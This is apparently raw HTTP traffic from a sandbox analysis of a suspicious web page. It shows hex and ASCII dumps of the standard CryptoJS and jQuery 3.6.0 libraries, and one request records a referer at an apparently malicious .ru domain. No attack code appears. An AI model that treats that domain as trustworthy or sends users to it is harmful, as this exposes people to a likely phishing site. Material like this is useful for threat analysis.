                                                                                                                                                                                                  2025-01-14 22:37:49 UTC405INData Raw: 37 62 65 64 0d 0a 21 66 75 6e 63 74 69 6f 6e 28 74 2c 65 29 7b 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 65 78 70 6f 72 74 73 3f 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3d 65 78 70 6f 72 74 73 3d 65 28 29 3a 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 20 64 65 66 69 6e 65 26 26 64 65 66 69 6e 65 2e 61 6d 64 3f 64 65 66 69 6e 65 28 5b 5d 2c 65 29 3a 74 2e 43 72 79 70 74 6f 4a 53 3d 65 28 29 7d 28 74 68 69 73 2c 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 6e 2c 6f 2c 73 2c 61 2c 68 2c 74 2c 65 2c 6c 2c 72 2c 69 2c 63 2c 66 2c 64 2c 75 2c 70 2c 53 2c 78 2c 62 2c 41 2c 48 2c 7a 2c 5f 2c 76 2c 67 2c 79 2c 42 2c 77 2c 6b 2c 6d 2c 43 2c 44 2c 45 2c 52 2c 4d 2c 46 2c 50 2c 57 2c 4f 2c 49 2c 55 3d 55 7c 7c 66 75 6e 63 74 69 6f 6e 28 68 29 7b
                                                                                                                                                                                                  Data Ascii: 7bed!function(t,e){"object"==typeof exports?module.exports=exports=e():"function"==typeof define&&define.amd?define([],e):t.CryptoJS=e()}(this,function(){var n,o,s,a,h,t,e,l,r,i,c,f,d,u,p,S,x,b,A,H,z,_,v,g,y,B,w,k,m,C,D,E,R,M,F,P,W,O,I,U=U||function(h){
                                                                                                                                                                                                  2025-01-14 22:37:49 UTC1369INData Raw: 74 79 70 65 6f 66 20 67 6c 6f 62 61 6c 54 68 69 73 26 26 67 6c 6f 62 61 6c 54 68 69 73 2e 63 72 79 70 74 6f 3f 67 6c 6f 62 61 6c 54 68 69 73 2e 63 72 79 70 74 6f 3a 69 29 26 26 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 77 69 6e 64 6f 77 26 26 77 69 6e 64 6f 77 2e 6d 73 43 72 79 70 74 6f 3f 77 69 6e 64 6f 77 2e 6d 73 43 72 79 70 74 6f 3a 69 29 26 26 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 67 6c 6f 62 61 6c 26 26 67 6c 6f 62 61 6c 2e 63 72 79 70 74 6f 3f 67 6c 6f 62 61 6c 2e 63 72 79 70 74 6f 3a 69 29 26 26 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 20 72 65 71 75 69 72 65 29 74 72 79 7b 69 3d 72 65 71 75 69 72 65 28 22 63 72 79 70 74 6f 22 29 7d 63 61 74 63 68 28 74 29 7b 7d 76 61 72 20 72 3d 4f 62 6a 65 63
                                                                                                                                                                                                  Data Ascii: typeof globalThis&&globalThis.crypto?globalThis.crypto:i)&&"undefined"!=typeof window&&window.msCrypto?window.msCrypto:i)&&"undefined"!=typeof global&&global.crypto?global.crypto:i)&&"function"==typeof require)try{i=require("crypto")}catch(t){}var r=Objec
                                                                                                                                                                                                  2025-01-14 22:37:49 UTC1369INData Raw: 6c 6f 6e 65 2e 63 61 6c 6c 28 74 68 69 73 29 3b 72 65 74 75 72 6e 20 74 2e 77 6f 72 64 73 3d 74 68 69 73 2e 77 6f 72 64 73 2e 73 6c 69 63 65 28 30 29 2c 74 7d 2c 72 61 6e 64 6f 6d 3a 66 75 6e 63 74 69 6f 6e 28 74 29 7b 66 6f 72 28 76 61 72 20 65 3d 5b 5d 2c 72 3d 30 3b 72 3c 74 3b 72 2b 3d 34 29 65 2e 70 75 73 68 28 66 75 6e 63 74 69 6f 6e 28 29 7b 69 66 28 69 29 7b 69 66 28 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 20 69 2e 67 65 74 52 61 6e 64 6f 6d 56 61 6c 75 65 73 29 74 72 79 7b 72 65 74 75 72 6e 20 69 2e 67 65 74 52 61 6e 64 6f 6d 56 61 6c 75 65 73 28 6e 65 77 20 55 69 6e 74 33 32 41 72 72 61 79 28 31 29 29 5b 30 5d 7d 63 61 74 63 68 28 74 29 7b 7d 69 66 28 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 20 69 2e 72 61 6e 64 6f 6d
                                                                                                                                                                                                  Data Ascii: lone.call(this);return t.words=this.words.slice(0),t},random:function(t){for(var e=[],r=0;r<t;r+=4)e.push(function(){if(i){if("function"==typeof i.getRandomValues)try{return i.getRandomValues(new Uint32Array(1))[0]}catch(t){}if("function"==typeof i.random
                                                                                                                                                                                                  2025-01-14 22:37:49 UTC1369INData Raw: 22 3d 3d 74 79 70 65 6f 66 20 74 26 26 28 74 3d 66 2e 70 61 72 73 65 28 74 29 29 2c 74 68 69 73 2e 5f 64 61 74 61 2e 63 6f 6e 63 61 74 28 74 29 2c 74 68 69 73 2e 5f 6e 44 61 74 61 42 79 74 65 73 2b 3d 74 2e 73 69 67 42 79 74 65 73 7d 2c 5f 70 72 6f 63 65 73 73 3a 66 75 6e 63 74 69 6f 6e 28 74 29 7b 76 61 72 20 65 2c 72 3d 74 68 69 73 2e 5f 64 61 74 61 2c 69 3d 72 2e 77 6f 72 64 73 2c 6e 3d 72 2e 73 69 67 42 79 74 65 73 2c 6f 3d 74 68 69 73 2e 62 6c 6f 63 6b 53 69 7a 65 2c 73 3d 6e 2f 28 34 2a 6f 29 2c 63 3d 28 73 3d 74 3f 68 2e 63 65 69 6c 28 73 29 3a 68 2e 6d 61 78 28 28 30 7c 73 29 2d 74 68 69 73 2e 5f 6d 69 6e 42 75 66 66 65 72 53 69 7a 65 2c 30 29 29 2a 6f 2c 6e 3d 68 2e 6d 69 6e 28 34 2a 63 2c 6e 29 3b 69 66 28 63 29 7b 66 6f 72 28 76 61 72 20 61 3d
                                                                                                                                                                                                  Data Ascii: "==typeof t&&(t=f.parse(t)),this._data.concat(t),this._nDataBytes+=t.sigBytes},_process:function(t){var e,r=this._data,i=r.words,n=r.sigBytes,o=this.blockSize,s=n/(4*o),c=(s=t?h.ceil(s):h.max((0|s)-this._minBufferSize,0))*o,n=h.min(4*c,n);if(c){for(var a=
                                                                                                                                                                                                  2025-01-14 22:37:49 UTC1369INData Raw: 7b 66 6f 72 28 76 61 72 20 74 3d 74 68 69 73 2e 5f 58 2c 65 3d 74 68 69 73 2e 5f 43 2c 72 3d 30 3b 72 3c 38 3b 72 2b 2b 29 45 5b 72 5d 3d 65 5b 72 5d 3b 65 5b 30 5d 3d 65 5b 30 5d 2b 31 32 39 35 33 30 37 35 39 37 2b 74 68 69 73 2e 5f 62 7c 30 2c 65 5b 31 5d 3d 65 5b 31 5d 2b 33 35 34 35 30 35 32 33 37 31 2b 28 65 5b 30 5d 3e 3e 3e 30 3c 45 5b 30 5d 3e 3e 3e 30 3f 31 3a 30 29 7c 30 2c 65 5b 32 5d 3d 65 5b 32 5d 2b 38 38 36 32 36 33 30 39 32 2b 28 65 5b 31 5d 3e 3e 3e 30 3c 45 5b 31 5d 3e 3e 3e 30 3f 31 3a 30 29 7c 30 2c 65 5b 33 5d 3d 65 5b 33 5d 2b 31 32 39 35 33 30 37 35 39 37 2b 28 65 5b 32 5d 3e 3e 3e 30 3c 45 5b 32 5d 3e 3e 3e 30 3f 31 3a 30 29 7c 30 2c 65 5b 34 5d 3d 65 5b 34 5d 2b 33 35 34 35 30 35 32 33 37 31 2b 28 65 5b 33 5d 3e 3e 3e 30 3c 45 5b
                                                                                                                                                                                                  Data Ascii: {for(var t=this._X,e=this._C,r=0;r<8;r++)E[r]=e[r];e[0]=e[0]+1295307597+this._b|0,e[1]=e[1]+3545052371+(e[0]>>>0<E[0]>>>0?1:0)|0,e[2]=e[2]+886263092+(e[1]>>>0<E[1]>>>0?1:0)|0,e[3]=e[3]+1295307597+(e[2]>>>0<E[2]>>>0?1:0)|0,e[4]=e[4]+3545052371+(e[3]>>>0<E[
                                                                                                                                                                                                  2025-01-14 22:37:49 UTC1369INData Raw: 3f 31 3a 30 3b 66 6f 72 28 72 3d 30 3b 72 3c 38 3b 72 2b 2b 29 7b 76 61 72 20 69 3d 74 5b 72 5d 2b 65 5b 72 5d 2c 6e 3d 36 35 35 33 35 26 69 2c 6f 3d 69 3e 3e 3e 31 36 3b 49 5b 72 5d 3d 28 28 6e 2a 6e 3e 3e 3e 31 37 29 2b 6e 2a 6f 3e 3e 3e 31 35 29 2b 6f 2a 6f 5e 28 28 34 32 39 34 39 30 31 37 36 30 26 69 29 2a 69 7c 30 29 2b 28 28 36 35 35 33 35 26 69 29 2a 69 7c 30 29 7d 74 5b 30 5d 3d 49 5b 30 5d 2b 28 49 5b 37 5d 3c 3c 31 36 7c 49 5b 37 5d 3e 3e 3e 31 36 29 2b 28 49 5b 36 5d 3c 3c 31 36 7c 49 5b 36 5d 3e 3e 3e 31 36 29 7c 30 2c 74 5b 31 5d 3d 49 5b 31 5d 2b 28 49 5b 30 5d 3c 3c 38 7c 49 5b 30 5d 3e 3e 3e 32 34 29 2b 49 5b 37 5d 7c 30 2c 74 5b 32 5d 3d 49 5b 32 5d 2b 28 49 5b 31 5d 3c 3c 31 36 7c 49 5b 31 5d 3e 3e 3e 31 36 29 2b 28 49 5b 30 5d 3c 3c 31
                                                                                                                                                                                                  Data Ascii: ?1:0;for(r=0;r<8;r++){var i=t[r]+e[r],n=65535&i,o=i>>>16;I[r]=((n*n>>>17)+n*o>>>15)+o*o^((4294901760&i)*i|0)+((65535&i)*i|0)}t[0]=I[0]+(I[7]<<16|I[7]>>>16)+(I[6]<<16|I[6]>>>16)|0,t[1]=I[1]+(I[0]<<8|I[0]>>>24)+I[7]|0,t[2]=I[2]+(I[1]<<16|I[1]>>>16)+(I[0]<<1
                                                                                                                                                                                                  2025-01-14 22:37:49 UTC1369INData Raw: 62 75 66 66 65 72 2c 74 2e 62 79 74 65 4f 66 66 73 65 74 2c 74 2e 62 79 74 65 4c 65 6e 67 74 68 29 3a 74 29 69 6e 73 74 61 6e 63 65 6f 66 20 55 69 6e 74 38 41 72 72 61 79 29 7b 66 6f 72 28 76 61 72 20 65 3d 74 2e 62 79 74 65 4c 65 6e 67 74 68 2c 72 3d 5b 5d 2c 69 3d 30 3b 69 3c 65 3b 69 2b 2b 29 72 5b 69 3e 3e 3e 32 5d 7c 3d 74 5b 69 5d 3c 3c 32 34 2d 69 25 34 2a 38 3b 73 2e 63 61 6c 6c 28 74 68 69 73 2c 72 2c 65 29 7d 65 6c 73 65 20 73 2e 61 70 70 6c 79 28 74 68 69 73 2c 61 72 67 75 6d 65 6e 74 73 29 7d 29 2e 70 72 6f 74 6f 74 79 70 65 3d 50 29 2c 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 74 3d 55 2c 6e 3d 74 2e 6c 69 62 2e 57 6f 72 64 41 72 72 61 79 2c 74 3d 74 2e 65 6e 63 3b 74 2e 55 74 66 31 36 3d 74 2e 55 74 66 31 36 42 45 3d 7b 73 74 72 69 6e 67
                                                                                                                                                                                                  Data Ascii: buffer,t.byteOffset,t.byteLength):t)instanceof Uint8Array){for(var e=t.byteLength,r=[],i=0;i<e;i++)r[i>>>2]|=t[i]<<24-i%4*8;s.call(this,r,e)}else s.apply(this,arguments)}).prototype=P),function(){var t=U,n=t.lib.WordArray,t=t.enc;t.Utf16=t.Utf16BE={string
                                                                                                                                                                                                  2025-01-14 22:37:49 UTC1369INData Raw: 6f 3d 72 2e 63 68 61 72 41 74 28 36 34 29 3b 72 65 74 75 72 6e 21 6f 7c 7c 2d 31 21 3d 3d 28 6f 3d 74 2e 69 6e 64 65 78 4f 66 28 6f 29 29 26 26 28 65 3d 6f 29 2c 66 75 6e 63 74 69 6f 6e 28 74 2c 65 2c 72 29 7b 66 6f 72 28 76 61 72 20 69 3d 5b 5d 2c 6e 3d 30 2c 6f 3d 30 3b 6f 3c 65 3b 6f 2b 2b 29 7b 76 61 72 20 73 2c 63 3b 6f 25 34 26 26 28 73 3d 72 5b 74 2e 63 68 61 72 43 6f 64 65 41 74 28 6f 2d 31 29 5d 3c 3c 6f 25 34 2a 32 2c 63 3d 72 5b 74 2e 63 68 61 72 43 6f 64 65 41 74 28 6f 29 5d 3e 3e 3e 36 2d 6f 25 34 2a 32 2c 63 3d 73 7c 63 2c 69 5b 6e 3e 3e 3e 32 5d 7c 3d 63 3c 3c 32 34 2d 6e 25 34 2a 38 2c 6e 2b 2b 29 7d 72 65 74 75 72 6e 20 61 2e 63 72 65 61 74 65 28 69 2c 6e 29 7d 28 74 2c 65 2c 69 29 7d 2c 5f 6d 61 70 3a 22 41 42 43 44 45 46 47 48 49 4a 4b
                                                                                                                                                                                                  Data Ascii: o=r.charAt(64);return!o||-1!==(o=t.indexOf(o))&&(e=o),function(t,e,r){for(var i=[],n=0,o=0;o<e;o++){var s,c;o%4&&(s=r[t.charCodeAt(o-1)]<<o%4*2,c=r[t.charCodeAt(o)]>>>6-o%4*2,c=s|c,i[n>>>2]|=c<<24-n%4*8,n++)}return a.create(i,n)}(t,e,i)},_map:"ABCDEFGHIJK
                                                                                                                                                                                                  2025-01-14 22:37:49 UTC1369INData Raw: 2e 61 62 73 28 61 2e 73 69 6e 28 74 2b 31 29 29 7c 30 7d 28 29 3b 65 3d 65 2e 4d 44 35 3d 69 2e 65 78 74 65 6e 64 28 7b 5f 64 6f 52 65 73 65 74 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 74 68 69 73 2e 5f 68 61 73 68 3d 6e 65 77 20 72 2e 69 6e 69 74 28 5b 31 37 33 32 35 38 34 31 39 33 2c 34 30 32 33 32 33 33 34 31 37 2c 32 35 36 32 33 38 33 31 30 32 2c 32 37 31 37 33 33 38 37 38 5d 29 7d 2c 5f 64 6f 50 72 6f 63 65 73 73 42 6c 6f 63 6b 3a 66 75 6e 63 74 69 6f 6e 28 74 2c 65 29 7b 66 6f 72 28 76 61 72 20 72 3d 30 3b 72 3c 31 36 3b 72 2b 2b 29 7b 76 61 72 20 69 3d 65 2b 72 2c 6e 3d 74 5b 69 5d 3b 74 5b 69 5d 3d 31 36 37 31 31 39 33 35 26 28 6e 3c 3c 38 7c 6e 3e 3e 3e 32 34 29 7c 34 32 37 38 32 35 35 33 36 30 26 28 6e 3c 3c 32 34 7c 6e 3e 3e 3e 38 29 7d 76 61 72 20
                                                                                                                                                                                                  Data Ascii: .abs(a.sin(t+1))|0}();e=e.MD5=i.extend({_doReset:function(){this._hash=new r.init([1732584193,4023233417,2562383102,271733878])},_doProcessBlock:function(t,e){for(var r=0;r<16;r++){var i=e+r,n=t[i];t[i]=16711935&(n<<8|n>>>24)|4278255360&(n<<24|n>>>8)}var
                                                                                                                                                                                                  2025-01-14 22:37:49 UTC1369INData Raw: 41 5b 33 39 5d 29 2c 6d 3d 43 28 6d 2c 62 2c 78 2c 53 2c 42 2c 34 2c 41 5b 34 30 5d 29 2c 53 3d 43 28 53 2c 6d 2c 62 2c 78 2c 73 2c 31 31 2c 41 5b 34 31 5d 29 2c 78 3d 43 28 78 2c 53 2c 6d 2c 62 2c 68 2c 31 36 2c 41 5b 34 32 5d 29 2c 62 3d 43 28 62 2c 78 2c 53 2c 6d 2c 64 2c 32 33 2c 41 5b 34 33 5d 29 2c 6d 3d 43 28 6d 2c 62 2c 78 2c 53 2c 5f 2c 34 2c 41 5b 34 34 5d 29 2c 53 3d 43 28 53 2c 6d 2c 62 2c 78 2c 67 2c 31 31 2c 41 5b 34 35 5d 29 2c 78 3d 43 28 78 2c 53 2c 6d 2c 62 2c 6b 2c 31 36 2c 41 5b 34 36 5d 29 2c 6d 3d 44 28 6d 2c 62 3d 43 28 62 2c 78 2c 53 2c 6d 2c 61 2c 32 33 2c 41 5b 34 37 5d 29 2c 78 2c 53 2c 73 2c 36 2c 41 5b 34 38 5d 29 2c 53 3d 44 28 53 2c 6d 2c 62 2c 78 2c 75 2c 31 30 2c 41 5b 34 39 5d 29 2c 78 3d 44 28 78 2c 53 2c 6d 2c 62 2c 77
                                                                                                                                                                                                  Data Ascii: A[39]),m=C(m,b,x,S,B,4,A[40]),S=C(S,m,b,x,s,11,A[41]),x=C(x,S,m,b,h,16,A[42]),b=C(b,x,S,m,d,23,A[43]),m=C(m,b,x,S,_,4,A[44]),S=C(S,m,b,x,g,11,A[45]),x=C(x,S,m,b,k,16,A[46]),m=D(m,b=C(b,x,S,m,a,23,A[47]),x,S,s,6,A[48]),S=D(S,m,b,x,u,10,A[49]),x=D(x,S,m,b,w


                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                  3192.168.2.1649707151.101.194.1374436856C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                  2025-01-14 22:37:49 UTC621OUTGET /jquery-3.6.0.min.js HTTP/1.1
                                                                                                                                                                                                  Host: code.jquery.com
                                                                                                                                                                                                  Connection: keep-alive
                                                                                                                                                                                                  sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                  sec-ch-ua-mobile: ?0
                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                  Intervention: <https://www.chromestatus.com/feature/5718547946799104>; level="warning"
                                                                                                                                                                                                  sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                  Accept: */*
                                                                                                                                                                                                  Sec-Fetch-Site: cross-site
                                                                                                                                                                                                  Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                  Sec-Fetch-Dest: script
                                                                                                                                                                                                  Referer: https://6y.tickarmoz.ru/
                                                                                                                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                  2025-01-14 22:37:49 UTC613INHTTP/1.1 200 OK
                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                  Content-Length: 89501
                                                                                                                                                                                                  Server: nginx
                                                                                                                                                                                                  Content-Type: application/javascript; charset=utf-8
                                                                                                                                                                                                  Last-Modified: Fri, 18 Oct 1991 12:00:00 GMT
                                                                                                                                                                                                  ETag: "28feccc0-15d9d"
                                                                                                                                                                                                  Cache-Control: public, max-age=31536000, stale-while-revalidate=604800
                                                                                                                                                                                                  Access-Control-Allow-Origin: *
                                                                                                                                                                                                  Cross-Origin-Resource-Policy: cross-origin
                                                                                                                                                                                                  Via: 1.1 varnish, 1.1 varnish
                                                                                                                                                                                                  Accept-Ranges: bytes
                                                                                                                                                                                                  Date: Tue, 14 Jan 2025 22:37:49 GMT
                                                                                                                                                                                                  Age: 2378795
                                                                                                                                                                                                  X-Served-By: cache-lga21931-LGA, cache-ewr-kewr1740067-EWR
                                                                                                                                                                                                  X-Cache: HIT, HIT
                                                                                                                                                                                                  X-Cache-Hits: 2774, 2
                                                                                                                                                                                                  X-Timer: S1736894269.262015,VS0,VE0
                                                                                                                                                                                                  Vary: Accept-Encoding
                                                                                                                                                                                                  2025-01-14 22:37:49 UTC1378INData Raw: 2f 2a 21 20 6a 51 75 65 72 79 20 76 33 2e 36 2e 30 20 7c 20 28 63 29 20 4f 70 65 6e 4a 53 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 6f 74 68 65 72 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 20 7c 20 6a 71 75 65 72 79 2e 6f 72 67 2f 6c 69 63 65 6e 73 65 20 2a 2f 0a 21 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 26 26 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3f 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3d 65 2e 64 6f 63 75 6d 65 6e 74 3f 74 28 65 2c 21 30 29 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 69 66 28 21 65 2e 64 6f 63 75 6d 65 6e 74 29 74 68 72 6f 77 20 6e 65 77 20 45 72 72 6f 72 28 22 6a 51 75
                                                                                                                                                                                                  Data Ascii: /*! jQuery v3.6.0 | (c) OpenJS Foundation and other contributors | jquery.org/license */!function(e,t){"use strict";"object"==typeof module&&"object"==typeof module.exports?module.exports=e.document?t(e,!0):function(e){if(!e.document)throw new Error("jQu
                                                                                                                                                                                                  2025-01-14 22:37:49 UTC1378INData Raw: 7d 2c 67 65 74 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 65 74 75 72 6e 20 6e 75 6c 6c 3d 3d 65 3f 73 2e 63 61 6c 6c 28 74 68 69 73 29 3a 65 3c 30 3f 74 68 69 73 5b 65 2b 74 68 69 73 2e 6c 65 6e 67 74 68 5d 3a 74 68 69 73 5b 65 5d 7d 2c 70 75 73 68 53 74 61 63 6b 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 76 61 72 20 74 3d 53 2e 6d 65 72 67 65 28 74 68 69 73 2e 63 6f 6e 73 74 72 75 63 74 6f 72 28 29 2c 65 29 3b 72 65 74 75 72 6e 20 74 2e 70 72 65 76 4f 62 6a 65 63 74 3d 74 68 69 73 2c 74 7d 2c 65 61 63 68 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 65 74 75 72 6e 20 53 2e 65 61 63 68 28 74 68 69 73 2c 65 29 7d 2c 6d 61 70 3a 66 75 6e 63 74 69 6f 6e 28 6e 29 7b 72 65 74 75 72 6e 20 74 68 69 73 2e 70 75 73 68 53 74 61 63 6b 28 53 2e 6d 61 70 28 74 68 69 73 2c 66
                                                                                                                                                                                                  Data Ascii: },get:function(e){return null==e?s.call(this):e<0?this[e+this.length]:this[e]},pushStack:function(e){var t=S.merge(this.constructor(),e);return t.prevObject=this,t},each:function(e){return S.each(this,e)},map:function(n){return this.pushStack(S.map(this,f
                                                                                                                                                                                                  2025-01-14 22:37:49 UTC1378INData Raw: 6f 6e 28 65 29 7b 76 61 72 20 74 2c 6e 3b 72 65 74 75 72 6e 21 28 21 65 7c 7c 22 5b 6f 62 6a 65 63 74 20 4f 62 6a 65 63 74 5d 22 21 3d 3d 6f 2e 63 61 6c 6c 28 65 29 29 26 26 28 21 28 74 3d 72 28 65 29 29 7c 7c 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 28 6e 3d 76 2e 63 61 6c 6c 28 74 2c 22 63 6f 6e 73 74 72 75 63 74 6f 72 22 29 26 26 74 2e 63 6f 6e 73 74 72 75 63 74 6f 72 29 26 26 61 2e 63 61 6c 6c 28 6e 29 3d 3d 3d 6c 29 7d 2c 69 73 45 6d 70 74 79 4f 62 6a 65 63 74 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 76 61 72 20 74 3b 66 6f 72 28 74 20 69 6e 20 65 29 72 65 74 75 72 6e 21 31 3b 72 65 74 75 72 6e 21 30 7d 2c 67 6c 6f 62 61 6c 45 76 61 6c 3a 66 75 6e 63 74 69 6f 6e 28 65 2c 74 2c 6e 29 7b 62 28 65 2c 7b 6e 6f 6e 63 65 3a 74 26 26 74 2e 6e 6f
                                                                                                                                                                                                  Data Ascii: on(e){var t,n;return!(!e||"[object Object]"!==o.call(e))&&(!(t=r(e))||"function"==typeof(n=v.call(t,"constructor")&&t.constructor)&&a.call(n)===l)},isEmptyObject:function(e){var t;for(t in e)return!1;return!0},globalEval:function(e,t,n){b(e,{nonce:t&&t.no
                                                                                                                                                                                                  2025-01-14 22:37:49 UTC1378INData Raw: 5d 2c 71 3d 74 2e 70 6f 70 2c 4c 3d 74 2e 70 75 73 68 2c 48 3d 74 2e 70 75 73 68 2c 4f 3d 74 2e 73 6c 69 63 65 2c 50 3d 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 66 6f 72 28 76 61 72 20 6e 3d 30 2c 72 3d 65 2e 6c 65 6e 67 74 68 3b 6e 3c 72 3b 6e 2b 2b 29 69 66 28 65 5b 6e 5d 3d 3d 3d 74 29 72 65 74 75 72 6e 20 6e 3b 72 65 74 75 72 6e 2d 31 7d 2c 52 3d 22 63 68 65 63 6b 65 64 7c 73 65 6c 65 63 74 65 64 7c 61 73 79 6e 63 7c 61 75 74 6f 66 6f 63 75 73 7c 61 75 74 6f 70 6c 61 79 7c 63 6f 6e 74 72 6f 6c 73 7c 64 65 66 65 72 7c 64 69 73 61 62 6c 65 64 7c 68 69 64 64 65 6e 7c 69 73 6d 61 70 7c 6c 6f 6f 70 7c 6d 75 6c 74 69 70 6c 65 7c 6f 70 65 6e 7c 72 65 61 64 6f 6e 6c 79 7c 72 65 71 75 69 72 65 64 7c 73 63 6f 70 65 64 22 2c 4d 3d 22 5b 5c 5c 78 32 30 5c 5c 74
                                                                                                                                                                                                  Data Ascii: ],q=t.pop,L=t.push,H=t.push,O=t.slice,P=function(e,t){for(var n=0,r=e.length;n<r;n++)if(e[n]===t)return n;return-1},R="checked|selected|async|autofocus|autoplay|controls|defer|disabled|hidden|ismap|loop|multiple|open|readonly|required|scoped",M="[\\x20\\t
                                                                                                                                                                                                  2025-01-14 22:37:49 UTC1378INData Raw: 2c 65 65 3d 2f 5b 2b 7e 5d 2f 2c 74 65 3d 6e 65 77 20 52 65 67 45 78 70 28 22 5c 5c 5c 5c 5b 5c 5c 64 61 2d 66 41 2d 46 5d 7b 31 2c 36 7d 22 2b 4d 2b 22 3f 7c 5c 5c 5c 5c 28 5b 5e 5c 5c 72 5c 5c 6e 5c 5c 66 5d 29 22 2c 22 67 22 29 2c 6e 65 3d 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 76 61 72 20 6e 3d 22 30 78 22 2b 65 2e 73 6c 69 63 65 28 31 29 2d 36 35 35 33 36 3b 72 65 74 75 72 6e 20 74 7c 7c 28 6e 3c 30 3f 53 74 72 69 6e 67 2e 66 72 6f 6d 43 68 61 72 43 6f 64 65 28 6e 2b 36 35 35 33 36 29 3a 53 74 72 69 6e 67 2e 66 72 6f 6d 43 68 61 72 43 6f 64 65 28 6e 3e 3e 31 30 7c 35 35 32 39 36 2c 31 30 32 33 26 6e 7c 35 36 33 32 30 29 29 7d 2c 72 65 3d 2f 28 5b 5c 30 2d 5c 78 31 66 5c 78 37 66 5d 7c 5e 2d 3f 5c 64 29 7c 5e 2d 24 7c 5b 5e 5c 30 2d 5c 78 31 66 5c
                                                                                                                                                                                                  Data Ascii: ,ee=/[+~]/,te=new RegExp("\\\\[\\da-fA-F]{1,6}"+M+"?|\\\\([^\\r\\n\\f])","g"),ne=function(e,t){var n="0x"+e.slice(1)-65536;return t||(n<0?String.fromCharCode(n+65536):String.fromCharCode(n>>10|55296,1023&n|56320))},re=/([\0-\x1f\x7f]|^-?\d)|^-$|[^\0-\x1f\
                                                                                                                                                                                                  2025-01-14 22:37:49 UTC1378INData Raw: 29 29 7b 28 66 3d 65 65 2e 74 65 73 74 28 74 29 26 26 79 65 28 65 2e 70 61 72 65 6e 74 4e 6f 64 65 29 7c 7c 65 29 3d 3d 3d 65 26 26 64 2e 73 63 6f 70 65 7c 7c 28 28 73 3d 65 2e 67 65 74 41 74 74 72 69 62 75 74 65 28 22 69 64 22 29 29 3f 73 3d 73 2e 72 65 70 6c 61 63 65 28 72 65 2c 69 65 29 3a 65 2e 73 65 74 41 74 74 72 69 62 75 74 65 28 22 69 64 22 2c 73 3d 53 29 29 2c 6f 3d 28 6c 3d 68 28 74 29 29 2e 6c 65 6e 67 74 68 3b 77 68 69 6c 65 28 6f 2d 2d 29 6c 5b 6f 5d 3d 28 73 3f 22 23 22 2b 73 3a 22 3a 73 63 6f 70 65 22 29 2b 22 20 22 2b 78 65 28 6c 5b 6f 5d 29 3b 63 3d 6c 2e 6a 6f 69 6e 28 22 2c 22 29 7d 74 72 79 7b 72 65 74 75 72 6e 20 48 2e 61 70 70 6c 79 28 6e 2c 66 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 41 6c 6c 28 63 29 29 2c 6e 7d 63 61 74 63 68 28
                                                                                                                                                                                                  Data Ascii: )){(f=ee.test(t)&&ye(e.parentNode)||e)===e&&d.scope||((s=e.getAttribute("id"))?s=s.replace(re,ie):e.setAttribute("id",s=S)),o=(l=h(t)).length;while(o--)l[o]=(s?"#"+s:":scope")+" "+xe(l[o]);c=l.join(",")}try{return H.apply(n,f.querySelectorAll(c)),n}catch(
